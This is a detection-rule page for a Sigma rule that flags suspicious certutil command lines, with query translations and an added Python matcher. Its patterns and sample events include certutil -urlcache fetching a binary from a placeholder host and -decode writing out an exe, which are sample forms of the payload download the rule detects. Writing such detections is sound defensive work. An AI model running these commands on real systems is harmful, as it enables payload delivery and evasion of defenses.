atomic-threat-coverage/Atomic_Threat_Coverage/Detection_Rules/win_susp_certutil_command.md


| Title | Suspicious Certutil Command |
|:------|:----------------------------|
| Description | Detects a suspicious Microsoft certutil execution with sub commands such as 'decode', which is sometimes used to decode malicious code with the built-in certutil utility |
| ATT&CK Tactic | attack.defense_evasion |
| ATT&CK Technique | attack.t1140, attack.t1105 |
| Data Needed | |
| Trigger | |
| Severity Level | high |
| False Positives | False positives depend on scripts and administrative tools used in the monitored environment |
| Development Status | experimental |
| References | |
| Author | Florian Roth, juju4, keepwatch |
| Other Tags | attack.s0189, attack.g0007 |

Detection Rules

Sigma rule

title: Suspicious Certutil Command
status: experimental
description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code with
    the built-in certutil utility
author: Florian Roth, juju4, keepwatch
modified: 2019/01/22
references:
    - https://twitter.com/JohnLaTwC/status/835149808817991680
    - https://twitter.com/subTee/status/888102593838362624
    - https://twitter.com/subTee/status/888071631528235010
    - https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/
    - https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/
    - https://twitter.com/egre55/status/1087685529016193025
    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine:
            - '* -decode *'
            - '* /decode *'
            - '* -decodehex *'
            - '* /decodehex *'
            - '* -urlcache *'
            - '* /urlcache *'
            - '* -verifyctl *'
            - '* /verifyctl *'
            - '* -encode *'
            - '* /encode *'
            - '*certutil* -URL*'
            - '*certutil* /URL*'
            - '*certutil* -ping*'
            - '*certutil* /ping*'
    condition: selection
fields:
    - CommandLine
    - ParentCommandLine
tags:
    - attack.defense_evasion
    - attack.t1140
    - attack.t1105
    - attack.s0189
    - attack.g0007
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: high

es-qs


xpack-watcher


graylog

CommandLine:("* \\-decode *" "* \\/decode *" "* \\-decodehex *" "* \\/decodehex *" "* \\-urlcache *" "* \\/urlcache *" "* \\-verifyctl *" "* \\/verifyctl *" "* \\-encode *" "* \\/encode *" "*certutil* \\-URL*" "*certutil* \\/URL*" "*certutil* \\-ping*" "*certutil* \\/ping*")

splunk


logpoint


grep

grep -P '^(?:.*.* -decode .*|.*.* /decode .*|.*.* -decodehex .*|.*.* /decodehex .*|.*.* -urlcache .*|.*.* /urlcache .*|.*.* -verifyctl .*|.*.* /verifyctl .*|.*.* -encode .*|.*.* /encode .*|.*.*certutil.* -URL.*|.*.*certutil.* /URL.*|.*.*certutil.* -ping.*|.*.*certutil.* /ping.*)'
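Added example, not part of the ATC page or the Sigma rule itself: a small Python matcher that turns the rule's wildcard patterns into anchored, case-insensitive regexes (Sigma's default string matching; note that the grep translation above is case-sensitive) and applies them to constructed process_creation events. It shows that an `-urlcache` command line also trips the `*certutil* -URL*` pattern, and that the `-encode`/`-decode` patterns do not require certutil in the command line at all, which is the false-positive source the rule warns about. Event values and tool names are hypothetical.

```python
import re
# Wildcard patterns copied from the rule's selection list ('*' = any run of characters).
CERTUTIL_PATTERNS = [
    "* -decode *", "* /decode *", "* -decodehex *", "* /decodehex *",
    "* -urlcache *", "* /urlcache *", "* -verifyctl *", "* /verifyctl *",
    "* -encode *", "* /encode *", "*certutil* -URL*", "*certutil* /URL*",
    "*certutil* -ping*", "*certutil* /ping*",
]

def sigma_wildcard_to_regex(pattern: str) -> re.Pattern:
    """Anchored regex for a Sigma wildcard string: '*' -> '.*', the rest literal,
    case-insensitive because that is Sigma's default for string values."""
    parts = [re.escape(p) for p in pattern.split("*")]
    return re.compile("^" + ".*".join(parts) + "$", re.IGNORECASE | re.DOTALL)

COMPILED = [(p, sigma_wildcard_to_regex(p)) for p in CERTUTIL_PATTERNS]

def matching_patterns(command_line: str) -> list:
    """Patterns that fire for one CommandLine value; an empty list means no alert."""
    return [p for p, rx in COMPILED if rx.search(command_line)]

def evaluate(events: list) -> list:
    """Apply the rule (condition: selection) and return alerting events with the
    rule's output fields plus the patterns that matched."""
    hits = []
    for ev in events:
        matched = matching_patterns(ev.get("CommandLine", ""))
        if matched:
            hits.append({"CommandLine": ev.get("CommandLine", ""),
                         "ParentCommandLine": ev.get("ParentCommandLine", ""),
                         "matched": matched})
    return hits

# Constructed sample process_creation events (hypothetical, not real telemetry).
SAMPLE_EVENTS = [
    {"CommandLine": r"certutil.exe -decode C:\Temp\blob.txt C:\Temp\out.exe",
     "ParentCommandLine": "cmd.exe /c run.bat"},
    {"CommandLine": "certutil -urlcache -f http://example.invalid/update.bin update.bin",
     "ParentCommandLine": "powershell.exe"},
    {"CommandLine": "certutil -ping", "ParentCommandLine": "cmd.exe"},
    # Benign: dumps a certificate file and touches no listed sub command.
    {"CommandLine": r"certutil -dump C:\Temp\cert.cer", "ParentCommandLine": "explorer.exe"},
    # Not certutil at all, yet '* -encode *' fires: the false-positive source the rule notes.
    {"CommandLine": "backup_tool.exe -encode archive.dat archive.b64", "ParentCommandLine": "svc.exe"},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit["CommandLine"], "->", hit["matched"])
```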